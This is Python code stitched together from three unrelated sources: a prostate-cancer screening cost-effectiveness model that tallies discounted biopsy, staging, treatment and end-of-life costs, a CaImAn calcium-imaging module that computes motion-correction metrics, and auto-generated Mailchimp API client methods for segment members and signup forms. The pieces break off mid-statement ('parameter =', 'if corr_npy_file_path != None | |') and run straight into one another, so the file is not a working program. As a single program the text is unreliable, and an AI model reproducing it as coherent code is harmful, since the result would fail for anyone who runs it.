n_biopsies_post_screening_age = pca_incidence_post_screening / p_suspected_ns[:,year-45:]
cost_biopsies_post_screening_nodiscount_age = (((pca_incidence_post_screening / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_post_screening * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
# Total biopsies
n_biopsies_sc_age = (n_biopsies_screened_age + n_biopsies_post_screening_age)
# Total cost of biopsies
cost_biopsy_sc_nodiscount_age = (cost_biopsy_screened_nodiscount_age
+ cost_biopsies_post_screening_nodiscount_age)
(s_cost_biopsy_sc_nodiscount_age,
m_cost_biopsy_sc_nodiscount_age,
t_cost_biopsy_sc_nodiscount_age) = outcomes(cost_biopsy_sc_nodiscount_age)
cost_biopsy_sc_discount_age = cost_biopsy_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_biopsy_sc_discount_age,
m_cost_biopsy_sc_discount_age,
t_cost_biopsy_sc_discount_age) = outcomes(cost_biopsy_sc_discount_age)
# Costs of biopsy - non-screened arm
n_biopsies_ns_age = pca_incidence_ns / p_suspected_ns[:,year-45:]
cost_biopsy_ns_nodiscount_age = (((pca_incidence_ns / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_ns * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
(s_cost_biopsy_ns_nodiscount_age,
m_cost_biopsy_ns_nodiscount_age,
t_cost_biopsy_ns_nodiscount_age) = outcomes(cost_biopsy_ns_nodiscount_age)
cost_biopsy_ns_discount_age = cost_biopsy_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_biopsy_ns_discount_age,
m_cost_biopsy_ns_discount_age,
t_cost_biopsy_ns_discount_age) = outcomes(cost_biopsy_ns_discount_age)
# Total costs of biopsy
#######################
n_biopsies_age = n_biopsies_sc_age + n_biopsies_ns_age
(s_n_biopsies_age,
m_n_biopsies_age,
total_n_biopsies_age) = outcomes(n_biopsies_age)
cost_biopsy_nodiscount_age = cost_biopsy_sc_nodiscount_age + cost_biopsy_ns_nodiscount_age
(s_cost_biopsy_nodiscount_age,
m_cost_biopsy_nodiscount_age,
t_cost_biopsy_nodiscount_age) = outcomes(cost_biopsy_nodiscount_age)
cost_biopsy_discount_age = cost_biopsy_sc_discount_age + cost_biopsy_ns_discount_age
(s_cost_biopsy_discount_age,
m_cost_biopsy_discount_age,
t_cost_biopsy_discount_age) = outcomes(cost_biopsy_discount_age)
# Cost of staging in the screened arm
if year < 55:
cost_staging_sc_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_sc.T
* relative_cost_clinically_detected[:,year-45:].T).T
if year > 54:
cost_staging_screened_nodiscount_age = (cost_assessment
* psa_stage_screened_adv.T
* pca_incidence_screened.T).T
cost_staging_post_screening_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_post_screening.T
* relative_cost_clinically_detected[:,year-45:].T).T
cost_staging_sc_nodiscount_age = (cost_staging_screened_nodiscount_age
+ cost_staging_post_screening_nodiscount_age)
(s_cost_staging_sc_nodiscount_age,
m_cost_staging_sc_nodiscount_age,
t_cost_staging_sc_nodiscount_age) = outcomes(cost_staging_sc_nodiscount_age)
cost_staging_sc_discount_age = cost_staging_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_staging_sc_discount_age,
m_cost_staging_sc_discount_age,
t_cost_staging_sc_discount_age) = outcomes(cost_staging_sc_discount_age)
# Cost of staging in the non-screened arm
cost_staging_ns_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_ns.T
* relative_cost_clinically_detected[:,year-45:].T).T
(s_cost_staging_ns_nodiscount_age,
m_cost_staging_ns_nodiscount_age,
t_cost_staging_ns_nodiscount_age) = outcomes(cost_staging_ns_nodiscount_age)
cost_staging_ns_discount_age = cost_staging_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_staging_ns_discount_age,
m_cost_staging_ns_discount_age,
t_cost_staging_ns_discount_age) = outcomes(cost_staging_ns_discount_age)
# Total costs of staging
########################
cost_staging_nodiscount_age = cost_staging_sc_nodiscount_age + cost_staging_ns_nodiscount_age
(s_cost_staging_nodiscount_age,
m_cost_staging_nodiscount_age,
t_cost_staging_nodiscount_age) = outcomes(cost_staging_nodiscount_age)
cost_staging_discount_age = cost_staging_sc_discount_age + cost_staging_ns_discount_age
(s_cost_staging_discount_age,
m_cost_staging_discount_age,
t_cost_staging_discount_age) = outcomes(cost_staging_discount_age)
# Cost of treatment in screened arm
(s_cost_tx_sc_nodiscount_age,
m_cost_tx_sc_nodiscount_age,
t_cost_tx_sc_nodiscount_age) = outcomes(costs_tx_sc)
cost_tx_sc_discount_age = costs_tx_sc * discount_factor[:total_cycles]
(s_cost_tx_sc_discount_age,
m_cost_tx_sc_discount_age,
t_cost_tx_sc_discount_age) = outcomes(cost_tx_sc_discount_age)
# Cost of treatment in non-screened arm
(s_cost_tx_ns_nodiscount_age,
m_cost_tx_ns_nodiscount_age,
t_cost_tx_ns_nodiscount_age) = outcomes(costs_tx_ns)
cost_tx_ns_discount_age = costs_tx_ns * discount_factor[:total_cycles]
(s_cost_tx_ns_discount_age,
m_cost_tx_ns_discount_age,
t_cost_tx_ns_discount_age) = outcomes(cost_tx_ns_discount_age)
# Total costs of treatment
##########################
cost_tx_nodiscount_age = costs_tx_sc + costs_tx_ns
(s_cost_tx_nodiscount_age,
m_cost_tx_nodiscount_age,
t_cost_tx_nodiscount_age) = outcomes(cost_tx_nodiscount_age)
cost_tx_discount_age = cost_tx_nodiscount_age * discount_factor[:total_cycles]
(s_cost_tx_discount_age,
m_cost_tx_discount_age,
t_cost_tx_discount_age) = outcomes(cost_tx_discount_age)
# Costs of palliation and death in screened arm
cost_eol_sc_nodiscount_age = (pca_death_costs * pca_death_sc.T).T
(s_cost_eol_sc_nodiscount_age,
m_cost_eol_sc_nodiscount_age,
t_cost_eol_sc_nodiscount_age) = outcomes(cost_eol_sc_nodiscount_age)
cost_eol_sc_discount_age = cost_eol_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_eol_sc_discount_age,
m_cost_eol_sc_discount_age,
t_cost_eol_sc_discount_age) = outcomes(cost_eol_sc_discount_age)
# Costs of palliation and death in non-screened arm
cost_eol_ns_nodiscount_age = (pca_death_costs * pca_death_ns.T).T
(s_cost_eol_ns_nodiscount_age,
m_cost_eol_ns_nodiscount_age,
t_cost_eol_ns_nodiscount_age) = outcomes(cost_eol_ns_nodiscount_age)
cost_eol_ns_discount_age = cost_eol_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_eol_ns_discount_age,
m_cost_eol_ns_discount_age,
t_cost_eol_ns_discount_age) = outcomes(cost_eol_ns_discount_age)
# Total costs of palliation and death
cost_eol_nodiscount_age = cost_eol_sc_nodiscount_age + cost_eol_ns_nodiscount_age
(s_cost_eol_nodiscount_age,
m_cost_eol_nodiscount_age,
t_cost_eol_nodiscount_age) = outcomes(cost_eol_nodiscount_age)
cost_eol_discount_age = cost_eol_sc_discount_age + cost_eol_ns_discount_age
(s_cost_eol_discount_age,
m_cost_eol_discount_age,
t_cost_eol_discount_age) = outcomes(cost_eol_discount_age)
# TOTAL COSTS AGE-BASED SCREENING
#################################
cost_nodiscount_age = (cost_psa_testing_nodiscount_age
+ cost_biopsy_nodiscount_age
+ cost_staging_nodiscount_age
+ cost_tx_nodiscount_age
+ cost_eol_nodiscount_age)
s_cost_nodiscount_age, m_cost_nodiscount_age, t_cost_nodiscount_age = outcomes(cost_nodiscount_age)
cost_discount_age = (cost_psa_testing_discount_age
+ cost_biopsy_discount_age
+ cost_staging_discount_age
+ cost_tx_discount_age
+ cost_eol_discount_age)
s_cost_discount_age, m_cost_discount_age, t_cost_discount_age = outcomes(cost_discount_age)
# Generate a mean dataframe
age_matrix = [age, m_cases_age, m_cases_sc_detected_age,
m_cases_post_screening_age, m_overdiagnosis_age, m_deaths_other_age, m_deaths_pca_age,
m_pca_alive_ns, m_healthy_age, m_lyrs_healthy_nodiscount_age,
m_lyrs_healthy_discount_age, m_lyrs_pca_discount_age, m_lyrs_discount_age,
m_qalys_healthy_discount_age, m_qalys_pca_discount_age, m_qalys_discount_age,
m_cost_psa_testing_discount_age, m_cost_biopsy_discount_age, m_cost_staging_discount_age,
m_cost_tx_discount_age, m_cost_eol_discount_age, m_cost_discount_age]
age_columns = ['age', 'pca_cases', 'screen-detected cases',
'post-screening cases', 'overdiagnosis', 'deaths_other', 'deaths_pca',
'pca_alive', 'healthy','lyrs_healthy_nodiscount', 'lyrs_healthy_discount',
'lyrs_pca_discount', 'total_lyrs_discount',
'qalys_healthy_discount', 'qalys_pca_discount', 'total_qalys_discount',
'cost_psa_testing_discount', 'cost_biopsy_discount', 'cost_staging_discount',
'cost_treatment_discount', 'costs_eol_discount', 'total_cost_discount']
age_cohort = pd.DataFrame(age_matrix, index = age_columns).T
t_parameters_age = [year, t_cases_age, t_overdiagnosis_age,
t_deaths_pca_age, t_deaths_other_age,
t_lyrs_healthy_discount_age, t_lyrs_pca_discount_age,
t_lyrs_nodiscount_age, t_lyrs_discount_age, t_qalys_healthy_discount_age,
t_qalys_pca_discount_age, t_qalys_nodiscount_age, t_qalys_discount_age,
t_cost_psa_testing_nodiscount_age, t_cost_psa_testing_discount_age,
t_cost_biopsy_nodiscount_age, t_cost_biopsy_discount_age,
t_cost_staging_nodiscount_age, t_cost_staging_discount_age,
t_cost_tx_nodiscount_age, t_cost_tx_discount_age,
t_cost_eol_nodiscount_age, t_cost_eol_discount_age,
t_cost_nodiscount_age, t_cost_discount_age,
total_n_psa_tests_age, total_n_biopsies_age]
columns_age = ['cohort_age_at_start', 'pca_cases', 'overdiagnosis',
'pca_deaths', 'deaths_other_causes',
'lyrs_healthy_discounted', 'lyrs_pca_discounted',
'lyrs_undiscounted', 'lyrs_discounted','qalys_healthy_discounted',
'qalys_pca_discounted', 'qalys_undiscounted', 'qalys_discounted',
'cost_psa_testing_undiscounted', 'cost_psa_testing_discounted',
'cost_biopsy_undiscounted', 'cost_biopsy_discounted',
'cost_staging_undiscounted', 'cost_staging_discounted',
'cost_treatment_undiscounted', 'cost_treatment_discounted',
'cost_eol_undiscounted', 'cost_eol_discounted',
'costs_undiscounted', 'costs_discounted', 'n_psa_tests', 'n_biopsies']
outcomes_age_psa = pd.DataFrame(t_parameters_age, index = columns_age).T
s_qalys_discount_age_df = pd.DataFrame(s_qalys_discount_age)
s_cost_discount_age_df = pd.DataFrame(s_cost_discount_age)
parameters_age = [s_qalys_discount_age, s_cost_discount_age,
s_deaths_pca_age, s_overdiagnosis_age,
age_cohort, outcomes_age_psa]
for index, parameter in enumerate(parameter_list_age):
parameter =
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author:<NAME>, <NAME>
This module concentrates all the functions related to quality measurements for the pipeline and also provides
some plotting for comparing those measures.
"""
import os
import logging
import pickle
import numpy as np
import datetime
import caiman as cm
import pylab as pl
from caiman.motion_correction import MotionCorrect
import scipy
import cv2
from src.Database.database_connection import database
mycursor = database.cursor()
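# NOTE: the functions below also rely on the pipeline's database and file-management
# helpers (referenced as `db` and `fm`), which this snippet does not import; in the
# original project they come from the pipeline's own modules.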
def get_metrics_motion_correction(row, crispness=False, local_correlations=False, correlations=False,
optical_flow=False):
'''
This is a wrapper function to compute (a selection of) the metrics provided
by CaImAn for motion correction.
input -> row : pandas Series (a row of the states DataFrame) with all relevant file-paths
crispness : bool variable to indicate whether crispness is supposed to be computed
local_correlations -> bool variable to indicate whether local_correlations is supposed to be computed
correlations - > bool variable to indicate whether correlations is supposed to be computed
optical_flow -> bool variable to indicate whether optical_flow is supposed to be computed
output -> row_local : updated row with the new output information
'''
row_local = row.copy()
index = row_local.name
# Get the parameters, motion correction output and cropping output of this row
parameters = eval(row_local.loc['motion_correction_parameters'])
output = eval(row_local.loc['motion_correction_output'])
cropping_output = eval(row_local.loc['cropping_output'])
# Get the metrics file path
metrics_pkl_file_path = output['meta']['metrics']['other']
# Load the already available metrics
with open(metrics_pkl_file_path, 'rb') as f:
try:
meta_dict = pickle.load(f)
except:
meta_dict = {}
# ORIGINAL MOVIE
logging.info(f'{index} Computing metrics for original movie')
t0 = datetime.datetime.today()
fname_orig = cropping_output['main']
tmpl_orig, crispness_orig, crispness_corr_orig, correlations_orig, img_corr_orig, flows_orig, norms_orig = compute_metrics_motion_correction(
fname_orig, swap_dim=False, winsize=100, play_flow=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['original'] = {
'crispness': crispness_orig,
'crispness_corr': crispness_corr_orig
}
meta_dict['original'] = db.remove_None_from_dict({
'correlations': correlations_orig,
'local_correlations': img_corr_orig,
'flows': flows_orig,
'norms': norms_orig})
output['meta']['duration']['metrics_orig'] = dt
logging.info(f'{index} Computed metrics for original movie. dt = {dt} min')
# RIGID MOVIE
if not parameters['pw_rigid'] or (parameters['pw_rigid'] and 'alternate' in output):
logging.info(f'{index} Computing metrics for rigid movie')
t0 = datetime.datetime.today()
fname_rig = output['main'] if not parameters['pw_rigid'] else output['alternate']
tmpl_rig, crispness_rig, crispness_corr_rig, correlations_rig, img_corr_rig, flows_rig, norms_rig = compute_metrics_motion_correction(
fname_rig, swap_dim=False, winsize=100, play_flow=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['rigid'] = {
'crispness': crispness_rig,
'crispness_corr': crispness_corr_rig
}
meta_dict['rigid'] = db.remove_None_from_dict({
'correlations': correlations_rig,
'local_correlations': img_corr_rig,
'flows': flows_rig,
'norms': norms_rig})
output['meta']['duration']['metrics_rig'] = dt
logging.info(f'{index} Computed metrics for rigid movie. dt = {dt} min')
if parameters['pw_rigid']:
logging.info(f'{index} Computing metrics for pw-rigid movie')
t0 = datetime.datetime.today()
fname_els = output['main']
tmpl_els, crispness_els, crispness_corr_els, correlations_els, img_corr_els, flows_els, norms_els = compute_metrics_motion_correction(
fname_els, swap_dim=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['pw_rigid'] = {
'crispness': crispness_els,
'crispness_corr': crispness_corr_els
}
meta_dict['pw_rigid'] = db.remove_None_from_dict({
'correlations': correlations_els,
'local_correlations': img_corr_els,
'flows': flows_els,
'norms': norms_els})
output['meta']['duration']['metrics_els'] = dt
logging.info(f'{index} Computed metrics for pw-rigid movie. dt = {dt} min')
# Save the metrics in a pkl file
logging.info(f'{index} Saving metrics')
with open(metrics_pkl_file_path, 'wb') as f:
pickle.dump(meta_dict, f)
logging.info(f'{index} Saved metrics')
row_local.loc['motion_correction_output'] = str(output)
return row_local
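# Usage sketch (illustrative only; `states_df` is a hypothetical pandas DataFrame of
# analysis states with the columns accessed above):
#
#     row = states_df.iloc[0]
#     row = get_metrics_motion_correction(row, crispness=True, correlations=True,
#                                         local_correlations=True, optical_flow=False)
#     states_df.iloc[0] = row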
def compute_metrics_motion_correction(file_name, swap_dim, pyr_scale=.5, levels=3,
winsize=100, iterations=15, poly_n=5, poly_sigma=1.2 / 5, flags=0,
play_flow=False, resize_fact_flow=.2, template=None, save_npz=False,
one_photon=True, crispness=True, correlations=True, local_correlations=True,
optical_flow=True):
'''
This function is copied from the CaImAn package and edited for use in this calcium
imaging analysis pipeline. It contained some abnormalities that we wanted to avoid.
'''
# Logic
if crispness: local_correlations = True
# Load the movie
m = cm.load(file_name)
vmin, vmax = -1, 1
# Check the movie for NaNs, which may cause problems
if np.sum(np.isnan(m)) > 0:
logging.info(m.shape)
logging.warning('Movie contains NaN')
raise Exception('Movie contains NaN')
if template is None:
tmpl = cm.motion_correction.bin_median(m)
else:
tmpl = template
if correlations:
logging.debug('Computing correlations')
t0 = datetime.datetime.today()
correlations = []
count = 0
if one_photon:
m_compute = m - np.min(m)
for fr in m_compute:
if count % 100 == 0:
logging.debug(f'Frame {count}')
count += 1
correlations.append(scipy.stats.pearsonr(
fr.flatten(), tmpl.flatten())[0])
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed correlations. dt = {dt} min')
else:
correlations = None
if local_correlations:
logging.debug('Computing local correlations')
t0 = datetime.datetime.today()
img_corr = m.local_correlations(eight_neighbours=True, swap_dim=swap_dim)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed local correlations. dt = {dt} min')
else:
img_corr = None
if crispness:
logging.debug('Computing crispness')
t0 = datetime.datetime.today()
smoothness = np.sqrt(
np.sum(np.sum(np.array(np.gradient(np.mean(m, 0))) ** 2, 0)))
smoothness_corr = np.sqrt(
np.sum(np.sum(np.array(np.gradient(img_corr)) ** 2, 0)))
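# `smoothness` is the Frobenius norm of the spatial gradient of the temporal-mean
# image, and `smoothness_corr` the same norm computed on the local-correlation image;
# better-registered (sharper) movies typically give larger values.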
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(
f'Computed crispness. dt = {dt} min. Crispness = {smoothness}, crispness corr = {smoothness_corr}.')
else:
smoothness = None
if optical_flow:
logging.debug('Computing optical flow')
t0 = datetime.datetime.today()
m = m.resize(1, 1, resize_fact_flow)
norms = []
flows = []
count = 0
for fr in m:
if count % 100 == 0:
logging.debug(count)
count += 1
flow = cv2.calcOpticalFlowFarneback(
tmpl, fr, None, pyr_scale, levels, winsize, iterations, poly_n, poly_sigma, flags)
if play_flow:
pl.subplot(1, 3, 1)
pl.cla()
pl.imshow(fr, vmin=0, vmax=300, cmap='gray')
pl.title('movie')
pl.subplot(1, 3, 3)
pl.cla()
pl.imshow(flow[:, :, 1], vmin=vmin, vmax=vmax)
pl.title('y_flow')
pl.subplot(1, 3, 2)
pl.cla()
pl.imshow(flow[:, :, 0], vmin=vmin, vmax=vmax)
pl.title('x_flow')
pl.pause(.05)
n = np.linalg.norm(flow)
flows.append(flow)
norms.append(n)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed optical flow. dt = {dt} min')
else:
flows = norms = None
if save_npz:
logging.debug('Saving metrics in .npz format')
np.savez(file_name[:-4] + '_metrics', flows=flows, norms=norms, correlations=correlations, smoothness=smoothness,
tmpl=tmpl, smoothness_corr=smoothness_corr, img_corr=img_corr)
logging.debug('Saved metrics in .npz format')
return tmpl, smoothness, smoothness_corr, correlations, img_corr, flows, norms
def compare_crispness(selected_rows = None):
total_states_number = len(selected_rows)
crispness_mean = np.zeros(total_states_number-1)
crispness_corr = np.zeros(total_states_number-1)
crispness_mean_original = np.zeros(total_states_number-1)
crispness_corr_original = np.zeros(total_states_number-1)
for ii in range(0,total_states_number-1):
current_row = selected_rows.iloc[ii+1]
output_dic = eval(current_row['motion_correction_output'])
crispness_mean_original[ii] = output_dic['meta']['metrics']['original']['crispness']
crispness_corr_original[ii] = output_dic['meta']['metrics']['original']['crispness_corr']
if 'rigid' in output_dic['meta']['metrics'].keys():
crispness_mean[ii] = output_dic['meta']['metrics']['rigid']['crispness']
crispness_corr[ii] = output_dic['meta']['metrics']['rigid']['crispness_corr']
else:
crispness_mean[ii] = output_dic['meta']['metrics']['pw_rigid']['crispness']
crispness_corr[ii] = output_dic['meta']['metrics']['pw_rigid']['crispness_corr']
return crispness_mean_original,crispness_corr_original, crispness_mean, crispness_corr
def select_corr_pnr_threshold(mouse_row,parameters_source_extraction):
'''
Computes detection thresholds from the summary images (correlation and PNR) and from their pointwise
product (as used in the CaImAn paper, Zhou et al. 2018).
:param mouse_row:
:param parameters_source_extraction: parameters that will be used for source
extraction. The relevant parameters here are min_corr and min_pnr, because the source extraction algorithm is
initialized (initial cell templates) at all pixels whose values surpass those thresholds.
:return: max_combined, max_corr, max_pnr: threshold for corr*pnr, and the corresponding values of corr and pnr
'''
input_mmap_file_path = eval(mouse_row.loc['motion_correction_output'])['main']
# Load memory mappable input file
if os.path.isfile(input_mmap_file_path):
Yr, dims, T = cm.load_memmap(input_mmap_file_path)
# logging.debug(f'{index} Loaded movie. dims = {dims}, T = {T}.')
images = Yr.T.reshape((T,) + dims, order='F')
else:
logging.warning(f'{mouse_row.name} .mmap file does not exist. Cancelling')
# Determine output paths
step_index = db.get_step_index('motion_correction')
data_dir = 'data/interim/source_extraction/trial_wise/'
# Check if the summary images are already there
gSig = parameters_source_extraction['gSig'][0]
corr_npy_file_path, pnr_npy_file_path = fm.get_corr_pnr_path(mouse_row.name, gSig_abs=(gSig, gSig))
if corr_npy_file_path is not None and os.path.isfile(corr_npy_file_path):
# Already computed summary images
logging.info(f'{mouse_row.name} Already computed summary images')
cn_filter = np.load(corr_npy_file_path)
pnr = np.load(pnr_npy_file_path)
else:
# Compute summary images
t0 = datetime.datetime.today()
logging.info(f'{mouse_row.name} Computing summary images')
cn_filter, pnr = cm.summary_images.correlation_pnr(images[::1], gSig=parameters_source_extraction['gSig'][0],
swap_dim=False)
# Saving summary images as npy files
corr_npy_file_path = data_dir + f'meta/corr/{db.create_file_name(3, mouse_row.name)}_gSig_{gSig}.npy'
pnr_npy_file_path = data_dir + f'meta/pnr/{db.create_file_name(3, mouse_row.name)}_gSig_{gSig}.npy'
with open(corr_npy_file_path, 'wb') as f:
np.save(f, cn_filter)
with open(pnr_npy_file_path, 'wb') as f:
np.save(f, pnr)
combination = cn_filter * pnr # this is as defined in Zhou et al 2018 (definition of R, P and L, eq 14)
max_combined = np.argmax(combination)
row = int(np.floor(max_combined / cn_filter.shape[1]))
column = int(max_combined - row * cn_filter.shape[1])
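# row/column recover the 2-D position of the flattened argmax, i.e. the same result
# as np.unravel_index(max_combined, cn_filter.shape).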
max_corr = cn_filter[row, column]
max_pnr = pnr[row, column]
return max_combined, max_corr, max_pnr
def create_corr_pnr_histogram(mouse_row,parameters_source_extraction):
'''
Returns a histogram of the summary images (correlation and PNR)
:param mouse_row:
:param parameters_source_extraction: parameters that will be used for source extraction.
:return: histogram vector
'''
input_mmap_file_path = eval(mouse_row.loc['motion_correction_output'])['main']
# Load memory mappable input file
if os.path.isfile(input_mmap_file_path):
Yr, dims, T = cm.load_memmap(input_mmap_file_path)
# logging.debug(f'{index} Loaded movie. dims = {dims}, T = {T}.')
images = Yr.T.reshape((T,) + dims, order='F')
else:
logging.warning(f'{mouse_row.name} .mmap file does not exist. Cancelling')
# Determine output paths
step_index = db.get_step_index('motion_correction')
data_dir = 'data/interim/source_extraction/trial_wise/'
# Check if the summary images are already there
gSig = parameters_source_extraction['gSig'][0]
corr_npy_file_path, pnr_npy_file_path = fm.get_corr_pnr_path(mouse_row.name, gSig_abs=(gSig, gSig))
if corr_npy_file_path != None | |
>>> thread = api.get_segment_members_list(list_id, segment_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:param str segment_id: The unique id for the segment. (required)
:param list[str] fields: A comma-separated list of fields to return. Reference parameters of sub-objects with dot notation.
:param list[str] exclude_fields: A comma-separated list of fields to exclude. Reference parameters of sub-objects with dot notation.
:param int count: The number of records to return. Default value is 10. Maximum value is 1000
:param int offset: Used for [pagination](https://mailchimp.com/developer/marketing/docs/methods-parameters/#pagination), this is the number of records from a collection to skip. Default value is 0.
:param bool include_cleaned: Include cleaned members in response
:param bool include_transactional: Include transactional members in response
:param bool include_unsubscribed: Include unsubscribed members in response
:return: SegmentMembers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_segment_members_list_with_http_info(list_id, segment_id, **kwargs) # noqa: E501
else:
(data) = self.get_segment_members_list_with_http_info(list_id, segment_id, **kwargs) # noqa: E501
return data
def get_segment_members_list_with_http_info(self, list_id, segment_id, **kwargs): # noqa: E501
"""List members in segment # noqa: E501
Get information about members in a saved segment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_segment_members_list_with_http_info(list_id, segment_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:param str segment_id: The unique id for the segment. (required)
:param list[str] fields: A comma-separated list of fields to return. Reference parameters of sub-objects with dot notation.
:param list[str] exclude_fields: A comma-separated list of fields to exclude. Reference parameters of sub-objects with dot notation.
:param int count: The number of records to return. Default value is 10. Maximum value is 1000
:param int offset: Used for [pagination](https://mailchimp.com/developer/marketing/docs/methods-parameters/#pagination), this is the number of records from a collection to skip. Default value is 0.
:param bool include_cleaned: Include cleaned members in response
:param bool include_transactional: Include transactional members in response
:param bool include_unsubscribed: Include unsubscribed members in response
:return: SegmentMembers
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id', 'segment_id', 'fields', 'exclude_fields', 'count', 'offset', 'include_cleaned', 'include_transactional', 'include_unsubscribed'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_segment_members_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
# verify the required parameter 'segment_id' is set
if ('segment_id' not in params or
params['segment_id'] is None):
raise ValueError("Missing the required parameter `segment_id` when calling ``") # noqa: E501
if 'count' in params and params['count'] > 1000: # noqa: E501
raise ValueError("Invalid value for parameter `count` when calling ``, must be a value less than or equal to `1000`") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
if 'segment_id' in params:
path_params['segment_id'] = params['segment_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
collection_formats['fields'] = 'csv' # noqa: E501
if 'exclude_fields' in params:
query_params.append(('exclude_fields', params['exclude_fields'])) # noqa: E501
collection_formats['exclude_fields'] = 'csv' # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'include_cleaned' in params:
query_params.append(('include_cleaned', params['include_cleaned'])) # noqa: E501
if 'include_transactional' in params:
query_params.append(('include_transactional', params['include_transactional'])) # noqa: E501
if 'include_unsubscribed' in params:
query_params.append(('include_unsubscribed', params['include_unsubscribed'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/problem+json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/lists/{list_id}/segments/{segment_id}/members', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SegmentMembers', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
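# Hedged usage sketch (assumes an already-configured `api` lists client and
# real list/segment ids; the `members` attribute name on SegmentMembers is an
# assumption). Pages through a saved segment with the count/offset parameters
# documented above:
#
#     offset = 0
#     while True:
#         page = api.get_segment_members_list(list_id, segment_id,
#                                             count=100, offset=offset)
#         batch = getattr(page, 'members', []) or []
#         if not batch:
#             break
#         offset += len(batch)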
def get_list_signup_forms(self, list_id, **kwargs): # noqa: E501
"""List signup forms # noqa: E501
Get signup forms for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_signup_forms(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListSignupForms
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_list_signup_forms_with_http_info(list_id, **kwargs) # noqa: E501
else:
(data) = self.get_list_signup_forms_with_http_info(list_id, **kwargs) # noqa: E501
return data
def get_list_signup_forms_with_http_info(self, list_id, **kwargs): # noqa: E501
"""List signup forms # noqa: E501
Get signup forms for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_signup_forms_with_http_info(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListSignupForms
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_list_signup_forms" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
